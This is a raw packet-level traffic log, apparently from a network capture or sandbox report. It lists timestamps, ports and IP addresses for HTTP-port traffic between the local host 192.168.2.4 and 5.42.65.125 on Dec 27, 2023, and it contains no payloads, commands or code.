Dec 27, 2023 18:12:25.149230003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149241924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149252892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149264097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.149264097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149291992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.149307966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.149977922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149991989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150028944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150057077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150069952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150087118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150096893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150108099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150115967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150120020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150131941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150144100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150150061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150166035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150188923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150783062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150796890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150808096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150819063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150823116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150830984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150839090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150871992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150904894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150917053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150928974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150939941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150944948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150973082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.150985956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.150990009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151000977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151012897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151025057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.151055098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.151726007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151875019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151886940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151897907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151909113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151920080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151923895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.151932001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151942968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151953936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151957035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.151964903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151977062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151983023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.151988029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151999950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.151998997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.152019024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.152714968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152770996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152784109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152795076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152818918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.152827024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152839899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152852058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152867079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.152883053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.152916908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152930021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152940989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152951956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152962923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152973890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.152973890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.152998924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.153014898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.153712034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153774023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153785944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153798103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153825998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.153845072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.153903961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153914928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153925896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153937101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153948069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153959990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153959990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.153970957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.153984070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.154007912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.154572010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154650927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154664040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154675007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154697895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154709101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154711008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.154720068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154730082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.154731035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154742956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154746056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.154753923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154766083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154776096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154782057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.154808044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.154808998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.154850960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.155459881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155472040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155505896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155507088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.155586958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155599117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155632973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.155664921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155677080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155688047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155699015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155704021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.155709982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155724049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155730963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.155735016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155757904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.155767918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.155787945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.156436920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156450033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156502962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156512022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.156513929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156526089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156536102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.156538963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156563044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.156621933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156637907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156650066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156660080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.156662941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156675100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156683922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.156687021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156698942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.156716108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.157341957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157354116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157381058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.157407999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.157409906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157423019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157433987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157457113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157464981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.157491922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.157537937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157550097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157561064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157572031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157582998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.157589912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.157618046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.158085108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158123016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.158210993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158333063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158427000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158437967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158448935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158461094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158461094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.158472061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158483982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158494949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158490896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.158505917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158518076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158526897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.158529043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.158554077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.158576012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.159074068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159086943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159123898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.159159899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159173965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159183979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159194946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159205914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159214973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.159219027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159229994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159241915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.159252882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159262896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.159266949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159279108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159290075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.159291029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.159315109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.161834955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161847115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161859035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161870003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161880970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161891937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.161892891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161905050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161920071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161926985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.161951065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161952019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.161963940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161974907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161987066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161998034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.161998034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162023067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162045956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162067890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162081003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162091017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162101984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162110090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162113905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162131071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162141085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162143946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162156105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162167072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162173033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162178040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162189960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162192106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162200928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162211895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162215948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162223101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162245989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162266016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162271976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162278891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162291050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162302971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162312984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162313938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162337065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162350893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162363052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162374973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162383080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162385941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162398100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162410975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162432909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162755966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162767887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162806034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162813902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162826061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162843943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162856102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162880898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162892103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162899017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162904024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162916899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162929058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162935019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162940979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162954092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162961960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.162966013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.162986994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.163976908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.163990974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164002895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164022923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164047003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164052010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164060116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164094925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164120913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164132118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164144039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164180040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164186954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164199114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164228916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164237976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164251089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164273024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164280891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164307117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164652109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164664984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164741039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164752960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164763927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164774895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164776087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164788008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164798975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164805889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164813042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164824963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164829969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.164836884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.164860010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.165447950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165508032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165519953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165545940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165549994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.165558100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165571928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.165580034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165591955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165597916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.165604115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165625095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.165677071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165689945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165702105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165713072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165713072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.165725946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.165738106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.165762901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.166388035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.166399956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.166426897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.166436911 CET	49738	80	192.168.2.4	5.42.65.125
